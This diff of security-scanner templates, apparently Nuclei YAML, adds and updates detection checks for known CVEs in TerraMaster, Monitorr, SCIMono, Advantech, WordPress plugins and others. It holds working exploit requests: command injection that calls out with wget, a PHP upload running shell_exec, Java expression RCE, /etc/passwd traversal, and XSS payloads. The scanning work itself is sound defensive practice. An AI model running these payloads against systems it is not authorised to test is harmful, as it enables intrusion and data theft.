- 'Debug Enable!'
|
||||
part: body
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2020-28188
|
||||
|
||||
info:
|
||||
name: TerraMaster TOS - Unauthenticated Remote Command Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.
|
||||
reference: |
|
||||
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
|
||||
- https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
|
||||
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
|
||||
tags: cve,cve2020,terramaster,rce,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
|
||||
GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: keep-alive
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2020-28871
|
||||
|
||||
info:
|
||||
name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
|
||||
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
|
||||
- https://www.exploit-db.com/exploits/48980
|
||||
tags: cve,cve2020,monitorr,rce,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /assets/php/upload.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: text/plain, */*; q=0.01
|
||||
Connection: close
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
|
||||
Origin: http://{{Hostname}}
|
||||
Referer: http://{{Hostname}}
|
||||
|
||||
-----------------------------31046105003900160576454225745
|
||||
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
|
||||
Content-Type: image/gif
|
||||
|
||||
GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
|
||||
|
||||
-----------------------------31046105003900160576454225745--
|
||||
|
||||
- |
|
||||
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -1,11 +1,11 @@
|
|||
id: wordpress-auth-bypass-wptimecapsule
|
||||
id: CVE-2020-8771
|
||||
|
||||
info:
|
||||
name: WordPress WP Time Capsule Authentication Bypass
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
reference: https://github.com/SECFORCE/WPTimeCapsulePOC
|
||||
tags: wordpress,wp-plugin
|
||||
tags: cve,cve2020,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,7 +24,6 @@ requests:
|
|||
Accept: */*
|
||||
|
||||
cookie-reuse: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2021-21479
|
||||
|
||||
info:
|
||||
name: SCIMono < v0.0.19 Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
|
||||
description: |
|
||||
In SCIMono before 0.0.19, it is possible for an attacker to inject and
|
||||
execute java expression compromising the availability and integrity of the system.
|
||||
tags: cve,cve2021,scimono,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "The attribute value"
|
||||
- "java.lang.UNIXProcess@"
|
||||
- "has invalid value!"
|
||||
- '"status" : "400"'
|
||||
part: body
|
||||
condition: and
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-21801
|
||||
|
||||
info:
|
||||
name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS)
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
|
||||
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
|
||||
tags: cve,cve2021,r-seenet,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"zlo onerror=alert(1) "'
|
||||
- 'Device Status Graph'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-21802
|
||||
|
||||
info:
|
||||
name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS)
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
|
||||
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
|
||||
tags: cve,cve2021,r-seenet,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"zlo onerror=alert(1) "'
|
||||
- 'Device Status Graph'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-21803
|
||||
|
||||
info:
|
||||
name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS)
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
|
||||
reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
|
||||
tags: cve,cve2021,r-seenet,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"zlo onerror=alert(1) "'
|
||||
- 'Device Status Graph'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2021-23241
|
||||
|
||||
info:
|
||||
name: Mercury Router Web Server Directory Traversal
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
|
||||
reference: |
|
||||
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
|
||||
tags: cve,cve2021,iot,lfi,router
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/loginLess/../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[0*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
|
||||
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
|
||||
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=(alert)(123);>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
|
||||
- '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img src=x onerror=alert(123);>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
id: wp-plugin-statistics-sqli
|
||||
id: CVE-2021-24340
|
||||
|
||||
info:
|
||||
name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection
|
||||
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.exploit-db.com/exploits/49894
|
||||
- https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
|
||||
- https://github.com/Udyz/WP-Statistics-BlindSQL
|
||||
tags: wordpress,wp-plugin,unauth,sqli,blind
|
||||
tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
|
||||
- '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>prompt(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2021-24498
|
||||
|
||||
info:
|
||||
name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: suman_kar
|
||||
description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.
|
||||
severity: medium
|
||||
tags: cve,cve2021,xss,wordpress,wp-plugin
|
||||
reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '><svg/onload=alert(1)><'
|
||||
- 'Calendar Details'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'text/html'
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2021-26475
|
||||
|
||||
info:
|
||||
name: EPrints 3.4.2 XSS
|
||||
author: geeknik
|
||||
description: EPrints 3.4.2 exposes a reflected XSS opportunity in the via a cgi/cal URI.
|
||||
reference: https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
|
||||
severity: medium
|
||||
tags: cve,cve2021,xss,eprints
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%27{{randstr}}%27)%3C/script%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</title><script>alert('{{randstr}}')</script>"
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,12 +1,14 @@
|
|||
id: moodle-jitsi-plugin-xss
|
||||
id: CVE-2021-26812
|
||||
|
||||
info:
|
||||
name: Moodle jitsi plugin XSS
|
||||
author: aceseven (digisec360)
|
||||
description: Cross-site Scripting in moodle jitsi plugin
|
||||
description: Cross Site Scripting (XSS) in the Jitsi Meet 2.7 through 2.8.3 plugin for Moodle via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject javascript code to be run by the application.
|
||||
severity: medium
|
||||
tags: moodle,jitsi,xss,revision
|
||||
reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67
|
||||
tags: cve,cve2021,moodle,jitsi,xss
|
||||
reference: |
|
||||
- https://github.com/udima-university/moodle-mod_jitsi/issues/67
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-26812
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -27,4 +29,4 @@ requests:
|
|||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
- "MoodleSession"
|
|
@ -4,9 +4,7 @@ info:
|
|||
name: Adobe AEM Default Credentials
|
||||
author: random-robbie
|
||||
severity: critical
|
||||
tags: aem,default-login
|
||||
reference:
|
||||
|
||||
tags: aem,default-login,fuzz
|
||||
requests:
|
||||
|
||||
- payloads:
|
||||
|
|
|
@ -24,7 +24,10 @@ requests:
|
|||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 201
|
||||
- 200
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: terramaster-login
|
||||
|
||||
info:
|
||||
name: TerraMaster Login Panel
|
||||
author: gy741
|
||||
severity: info
|
||||
tags: panel,terramaster
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<title>TOS Loading</title>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Server: TOS"
|
||||
- "X-Powered-By: TerraMaster"
|
||||
condition: or
|
||||
part: header
|
|
@ -24,7 +24,7 @@ requests:
|
|||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(tolower(body), "<html")'
|
||||
- '!contains(tolower(body), "<html") && !contains(tolower(body), "<!doctype") && !contains(tolower(body), "<script")'
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
|
|
|
@ -0,0 +1,21 @@
|
|||
id: vnc-service-detection
|
||||
info:
|
||||
name: VNC Service Detection
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
tags: network,vnc
|
||||
description: VNC service detection
|
||||
network:
|
||||
- inputs:
|
||||
- data: "\r\n"
|
||||
host:
|
||||
- "{{Hostname}}:5900"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "RFB"
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "RFB ([0-9.]+)"
|
|
@ -2032,3 +2032,7 @@ requests:
|
|||
name: "OpenSNS"
|
||||
dsl:
|
||||
- "status_code==200 && (\"1167011145\" == mmh3(base64_py(body)))"
|
||||
- type: dsl
|
||||
name: "SpamSniper"
|
||||
dsl:
|
||||
- "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))"
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: mirai-unknown-rce
|
||||
|
||||
info:
|
||||
name: Mirai Unknown - Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection.
|
||||
reference: |
|
||||
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||
tags: mirai,rce,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/login.cgi HTTP/1.1
|
||||
Connection: keep-alive
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||
|
||||
key=';`wget http://{{interactsh-url}}`;#
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
|
||||
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert('{{randstr}}')</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
|
||||
- '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -1,19 +0,0 @@
|
|||
id: wp-localize-post-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/45439
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -1,19 +0,0 @@
|
|||
id: wp-mail-masta-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Mail Masta 1.0 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/40290
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -10,13 +10,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -1,19 +0,0 @@
|
|||
id: wp-site-editor-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
|
||||
author: 0x240x23elu
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/44340
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
part: body
|
|
@ -10,16 +10,16 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -13,13 +13,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(1)</script>'
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
|
|
|
@ -1,29 +0,0 @@
|
|||
id: my-calender-xss
|
||||
|
||||
info:
|
||||
name: My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
reference: https://wpscan.com/vulnerability/9267
|
||||
tags: wordpress
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm(%2F{{randstr}}%2F)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=confirm(/{{randstr}}/)>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
